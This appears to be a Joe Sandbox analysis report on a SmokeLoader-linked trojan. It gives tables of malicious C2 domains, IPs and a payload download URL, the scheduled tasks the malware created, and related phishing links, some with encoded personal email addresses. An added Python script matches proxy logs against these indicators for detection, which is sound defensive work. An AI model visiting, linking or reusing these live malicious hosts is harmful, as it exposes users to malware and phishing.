https://api.msn.com/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
ninjahallnews.com | 23.145.40.168 | true | true | | unknown
nwgrus.ru | 109.175.29.39 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://23.145.40.164/ksa9104.exe | false | | unknown
https://ninjahallnews.com/search.php | true | | unknown
https://fallhandbat.com/search.php | true | | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
https://aka.ms/odirmr | explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ninjahallnews.com/earch.php | explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://powerpoint.office.comcember | explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ninjahallnews.com/search.phpMozilla/5.0 | explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 0000000D.00000002.2671360392.0000000000828000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 0000000E.00000002.4175889505.0000000002E77000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 00000011.00000002.4175623064.00000000009C8000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 00000013.00000002.4175797278.00000000032F7000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 00000014.00000002.4174637350.0000000000F18000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://excel.office.com | explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000001.00000000.1778417663.0000000007F40000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000001.00000000.1780694925.0000000009B60000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000001.00000000.1778954174.0000000008720000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ninjahallnews.com:443/search.phpge | explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/q | explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000001.00000000.1783714743.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000001.00000000.1783714743.000000000C964000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://wns.windows.com/L | explorer.exe, 00000001.00000000.1783714743.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://word.office.com | explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | | unknown
https://ninjahallnews.com/ | explorer.exe, 0000000C.00000002.2734650053.00000000033D0000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 0000000C.00000002.2734650053.000000000345A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://aka.ms/Vh5j3k | explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/v1/news/Feed/Windows?& | explorer.exe, 00000001.00000000.1779684746.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/ | explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.com_ | explorer.exe, 00000001.00000000.1783714743.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | explorer.exe, 0000000C.00000003.2706066309.0000000003441000.00000004.00000020.00020000.00000000.sdmp, DF4B.tmp.12.dr | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com:443/en-us/feed | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | explorer.exe, 00000001.00000000.1777426774.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
23.145.40.168 | ninjahallnews.com | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
211.171.233.129 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
109.175.29.39 | nwgrus.ru | Bosnia and Herzegowina | 9146 | BIHNETBIHNETAutonomusSystemBA | true
23.145.40.164 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | false
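The network tables above give three kinds of indicator: domains and IPs marked malicious, two C2 URLs that share the path /search.php on different hosts (ninjahallnews.com and fallhandbat.com), and memory strings in explorer.exe that place "search.php", "Mozilla/5.0" and "application/x-www-form-urlencoded" next to each other. The following is an added example, not Joe Sandbox code: it checks constructed proxy-log records against the listed indicators and, separately, against the request shape those strings imply (a form POST to /search.php with a bare Mozilla/5.0 user agent). That shape is an inference from the adjacent memory strings, not something the report states, and it is the part that keeps matching when the operator rotates to a host not in the table; the host rotated-c2.invalid below is made up for that purpose.

```python
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlsplit

# Indicators copied from the domain, IP and URL tables above (malicious == true),
# plus 23.145.40.164/ksa9104.exe, which the report lists as not malicious but
# which sits in the same SURFAIRWIRELESS range as the C2 address.
C2_DOMAINS = {"ninjahallnews.com", "fallhandbat.com", "nwgrus.ru"}
C2_IPS = {"23.145.40.168", "211.171.233.129", "109.175.29.39", "23.145.40.164"}
C2_URLS = {"ninjahallnews.com/search.php", "fallhandbat.com/search.php"}  # scheme-less

# Beacon shape inferred from the explorer.exe memory strings (assumption, not a
# statement from the report): form POST to /search.php, bare "Mozilla/5.0" UA.
BEACON_PATH = "/search.php"
BARE_UA = "Mozilla/5.0"
FORM_CT = "application/x-www-form-urlencoded"


@dataclass
class Request:
    """One proxy-log record (field names are assumptions for this example)."""
    method: str
    url: str
    user_agent: str
    content_type: str = ""


def host_of(url: str) -> str:
    # .hostname drops the port and IPv6 brackets; normalise case and trailing dot
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify(req: Request):
    """Return the reasons a request is suspicious; an empty list means clean."""
    parts = urlsplit(req.url)
    host = host_of(req.url)
    reasons = []
    if host in C2_DOMAINS or host in C2_IPS:
        reasons.append("known C2 host")
    if f"{host}{parts.path}" in C2_URLS:
        reasons.append("known C2 URL")
    if is_ip_literal(host) and parts.path.lower().endswith(".exe"):
        reasons.append("executable fetched from IP-literal host")
    if (req.method.upper() == "POST" and parts.path == BEACON_PATH
            and req.user_agent == BARE_UA
            and req.content_type.lower().startswith(FORM_CT)):
        reasons.append("SmokeLoader-style beacon shape")
    return reasons


def scan(requests):
    """Return (url, reasons) for every request that classify() flags."""
    flagged = []
    for req in requests:
        reasons = classify(req)
        if reasons:
            flagged.append((req.url, reasons))
    return flagged


# Constructed records: the first three mirror the report's indicators, the
# fourth is ordinary browser traffic, the fifth is the same beacon shape on an
# unlisted host, the sixth is a real browser posting a form to a /search.php.
REAL_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_REQUESTS = [
    Request("POST", "https://ninjahallnews.com/search.php", BARE_UA, FORM_CT),
    Request("GET", "https://23.145.40.164/ksa9104.exe", BARE_UA),
    Request("POST", "https://fallhandbat.com:443/search.php", BARE_UA, FORM_CT),
    Request("GET", "https://duckduckgo.com/chrome_newtab", REAL_UA),
    Request("POST", "https://rotated-c2.invalid/search.php", BARE_UA, FORM_CT),
    Request("POST", "https://www.example.com/search.php", REAL_UA, FORM_CT),
]

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_REQUESTS):
        print(url, "->", ", ".join(reasons))
```

Exact-match indicators age quickly for a loader whose C2 hosts rotate, so the beacon-shape rule is the one worth keeping after the listed domains go dark; tune it on your own proxy data first, since a bare "Mozilla/5.0" user agent is also produced by some legitimate scripts.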
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528498
Start date and time: 2024-10-08 00:18:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: bCnarg2O62.exe (renamed because original name is a hash value)
Original Sample Name: fa949a7589dc71ea006eb10ad025618a.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@62/14@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 150
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 88.221.110.91, 2.16.100.168
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: bCnarg2O62.exe
Time | Type | Description
18:19:51 | API Interceptor | 207355x Sleep call for process: explorer.exe modified
18:21:06 | API Interceptor | 14x Sleep call for process: WMIC.exe modified
23:19:54 | Task Scheduler | Run new task: Firefox Default Browser Agent 01E1BB247BE80AD9 path: C:\Users\user\AppData\Roaming\derhswe
23:20:40 | Task Scheduler | Run new task: Firefox Default Browser Agent 71CD91AEBED31792 path: C:\Users\user\AppData\Roaming\jfrhswe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
211.171.233.129
  rFdy6Oh3xT.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
  • mzxn.ru/tmp/index.php
  file.exe | malicious | Babuk, Djvu
  • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
  lzShU2RYJa.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  • cajgtus.com/files/1/build3.exe
  IzXkxsTrEt.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar
  • sdfjhuz.com/dl/build2.exe
  SKHOtnHl7J.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc
  • trmpc.com/check/index.php
  p2xoB50aKi.exe | malicious | SmokeLoader, Vidar
  • sjyey.com/tmp/index.php
  RnnWoAEP9mUhOXN_9mNdOzaP.exe | malicious | Amadey, SmokeLoader
  • cbinr.com/forum/index.php
  qpPYm1rHOS.exe | malicious | Amadey, SmokeLoader
  • cbinr.com/forum/index.php
  8TmTmPo08O.exe | malicious | LummaC, Glupteba, SmokeLoader, Stealc
  • sjyey.com/tmp/index.php
  38QTCIw4QJ.exe | malicious | LummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, zgRAT
  • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
109.175.29.39
  veEGy9FijY.exe | malicious | SmokeLoader
  • nwgrus.ru/tmp/index.php
  Cjmw6m68OV.exe | malicious | SmokeLoader
  • nwgrus.ru/tmp/index.php
  82HD7ZgYPA.exe | malicious | LummaC, Go Injector, LummaC Stealer, SmokeLoader
  • 100xmargin.com/tmp/index.php
  HliN0ju7OT.exe | malicious | LummaC, Go Injector, SmokeLoader
  • yosoborno.com/tmp/
  file.exe | malicious | Babuk, Djvu
  • cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
  file.exe | malicious | Babuk, Djvu
  • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
  xvJv1BpknZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
  • dbfhns.in/tmp/index.php
  file.exe | malicious | Babuk, Djvu, PrivateLoader
  • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
  SecuriteInfo.com.Win32.RansomX-gen.4067.126.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader
  • trmpc.com/check/index.php
  7vMi37TpMO.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc
  • kamsmad.com/tmp/index.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
nwgrus.ru
  BzLGqYKy7o.exe | malicious | SmokeLoader
  • 105.197.97.247
  UV2uLdRZix.exe | malicious | SmokeLoader
  • 185.12.79.25
  LKpIHL2abO.exe | malicious | SmokeLoader
  • 197.164.156.210
  wu5C20dPdy.exe | malicious | SmokeLoader
  • 190.147.128.172
  HaPJ2rPP6w.exe | malicious | SmokeLoader
  • 177.129.90.106
  c7v62g0YpB.exe | malicious | SmokeLoader
  • 190.147.2.86
  9VgIkx4su0.exe | malicious | SmokeLoader
  • 190.224.203.37
  veEGy9FijY.exe | malicious | SmokeLoader
  • 58.151.148.90
  v173TV3V11.exe | malicious | SmokeLoader
  • 190.219.117.240
  0k3ibTiMjy.exe | malicious | SmokeLoader
  • 189.61.54.32
s-part-0017.t-0009.t-msedge.net
  9Y6R8fs0wd.exe | malicious | LummaC
  • 13.107.246.45
  PFW1cgN8EK.exe | malicious | LummaC
  • 13.107.246.45
  https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ== | malicious | Unknown
  • 13.107.246.45
  SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe | malicious | LummaC
  • 13.107.246.45
  https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ== | malicious | Unknown
  • 13.107.246.45
  https://dsdhie.org/dsjhem | malicious | Unknown
  • 13.107.246.45
  SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe | malicious | LummaC
  • 13.107.246.45
  +18365366724753456-83736-10244688.html | malicious | HTMLPhisher
  • 13.107.246.45
  https://s.craft.me/yB5midhwwaHUPW | malicious | HTMLPhisher
  • 13.107.246.45
  https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8 | malicious | HtmlDropper
  • 13.107.246.45
fp2e7a.wpc.phicdn.net
  9Y6R8fs0wd.exe | malicious | LummaC
  • 192.229.221.95
  http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/ | malicious | Unknown
  • 192.229.221.95
  PFW1cgN8EK.exe | malicious | LummaC
  • 192.229.221.95
  https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ== | malicious | Unknown
  • 192.229.221.95
  SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe | malicious | LummaC
  • 192.229.221.95
  utmggBCMML.exe | malicious | LummaC
  • 192.229.221.95
  Bn7LPdQA1s.exe | malicious | LummaC, Vidar
  • 192.229.221.95
  https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ== | malicious | Unknown
  • 192.229.221.95
  https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ== | malicious | Unknown
  • 192.229.221.95
  https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ== | malicious | Unknown
  • 192.229.221.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LGDACOMLGDACOMCorporationKR
  2UngC9fiGa.elf | malicious | Mirai, Okiru
  • 106.254.133.76
  na.elf | malicious | Gafgyt
  • 211.237.8.93
  na.elf | malicious | Gafgyt
  • 27.255.85.18
  na.elf | malicious | Gafgyt
